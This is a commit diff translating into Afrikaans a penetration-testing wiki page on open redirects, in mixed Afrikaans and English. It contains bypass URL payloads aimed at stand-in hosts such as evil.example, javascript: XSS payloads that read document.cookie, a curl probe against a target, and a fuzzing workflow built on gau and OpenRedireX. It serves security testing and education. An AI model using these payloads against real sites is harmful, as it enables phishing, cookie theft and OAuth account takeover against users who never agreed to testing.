Translated ['src/pentesting-web/open-redirect.md'] to af

2025-10-10 18:36:50 +00:00 · 2025-10-01 15:27:11 +00:00 · 2025-10-01 15:27:11 +00:00 · fd51511c2c
commit fd51511c2c
parent b783a5a551
1 changed files with 115 additions and 8 deletions
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@ -5,14 +5,25 @@
 ## Open redirect
-### Herlei na localhost of arbitrêre domeine
+### Redirect to localhost or arbitrary domains
 - As die app “allows only internal/whitelisted hosts” slegs toelaat, probeer alternatiewe host-notasies om loopback of interne reekse via die redirect target te bereik:
 - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
 - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
 - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
 - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Hierdie is nuttig wanneer slegs “subdomains of X” toegelaat word maar host-resolusie steeds na 127.0.0.1 wys.
 - Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
 - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
 - Userinfo tricks defeat contains/startswith checks against trusted hosts:
 - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld.
 - Backslash parsing confusion between frameworks/browsers:
 - https://trusted.tld\@attacker.tld → sommige backends behandel “\” as 'n path char en slaag validasie; browsers normaliseer na “/” en interpreteer trusted.tld as userinfo, en stuur gebruikers na attacker.tld. Dit kom ook voor in Node/PHP URL-parser mismatches.
 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}
-### Open Redirect na XSS
+### Modern open-redirect to XSS pivots
 ```bash
 #Basic payload, javascript code is executed after "javascript:"
 javascript:alert(1)
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
 /x:1/:///%01javascript:alert(document.cookie)/
 ";alert(0);//
 ```
-## Open Redirect om svg-lêers op te laai
+<details>
 <summary>Meer moderne URL-gebaseerde bypass payloads</summary>
 ```text
 # Scheme-relative (current scheme is reused)
 //evil.example
 # Credentials (userinfo) trick
 https://trusted.example@evil.example/
 # Backslash confusion (server validates, browser normalizes)
 https://trusted.example\@evil.example/
 # Schemeless with whitespace/control chars
 evil.example%00
 %09//evil.example
 # Prefix/suffix matching flaws
 https://trusted.example.evil.example/
 https://evil.example/trusted.example
 # When only path is accepted, try breaking absolute URL detection
 /\\evil.example
 /..//evil.example
 ```
 ```
 </details>
 ## Open Redirect uploading svg files
 ```html
 <code>
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
 </svg>
 </code>
 ```
-## Algemene inspuitingsparameters
+
 ## Common injection parameters
 ```
 /{payload}
 ?next={payload}
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
 Redirect=https://c1h2e1.github.io
 ReturnUrl=https://c1h2e1.github.io
 ```
-## Kode voorbeelde
+
 ## Code examples
 #### .Net
 ```bash
 response.redirect("~/mysafe-subdomain/login.aspx")
 ```
 #### Java
 ```bash
 response.redirect("http://mysafedomain.com");
 ```
 #### PHP
 ```php
 <?php
 /* browser redirections*/
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
 exit;
 ?>
 ```
 ## Hunting and exploitation workflow (practical)
 - Single URL check with curl:
 ```bash
 curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
 ```
 - Discover and fuzz likely parameters at scale:
 <details>
 <summary>Click to expand</summary>
 ```bash
 # 1) Versamel historiese URLs, hou dié met algemene redirect params
 cat domains.txt \
 | gau --o urls.txt            # or: waybackurls / katana / hakrawler
 # 2) Grep algemene parameters en normaliseer lys
 rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
 | sed 's/\r$//' | sort -u > candidates.txt
 # 3) Gebruik OpenRedireX om te fuzz met payload corpus
 cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
 # 4) Handmatig verifieer interessante treffers
 awk '/30[1237]|Location:/I' results.txt
 ```
 ```
 </details>
 - Moenie client-side sinks in SPAs vergeet nie: soek na window.location/assign/replace en framework helpers wat query/hash lees en redirect.
 - Frameworks bring dikwels footguns wanneer redirect-bestemmings afgelei word van onbetroubare insette (query params, Referer, cookies). Sien Next.js notas oor redirects en vermy dinamiese bestemmings wat van gebruiker-insette afgelei is.
 {{#ref}}
 ../network-services-pentesting/pentesting-web/nextjs.md
 {{#endref}}
 - OAuth/OIDC flows: misbruik van open redirectors eskaleer gereeld na account takeover deur leaking van authorization codes/tokens. Sien toegewyde gids:
 {{#ref}}
 ./oauth-to-account-takeover.md
 {{#endref}}
 - Server responses wat redirects implementeer sonder Location (meta refresh/JavaScript) is steeds uitbuitbaar vir phishing en kan soms gekoppel word. Grep for:
 ```html
 <meta http-equiv="refresh" content="0;url=//evil.example">
 <script>location = new URLSearchParams(location.search).get('next')</script>
 ```
 ## Gereedskap
 - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
 - OpenRedireX – fuzzer vir die opsporing van open redirects. Voorbeeld:
 ```bash
 # Install
 git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
-## Hulpbronne
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
 cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
 ```
 ## Verwysings
- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) kan jy fuzzing lyste vind.
+- By https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect kan jy fuzzing-lyste vind.
 - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
 - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
 - OpenRedireX – 'n fuzzer vir die opsporing van open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
 {{#include ../banners/hacktricks-training.md}}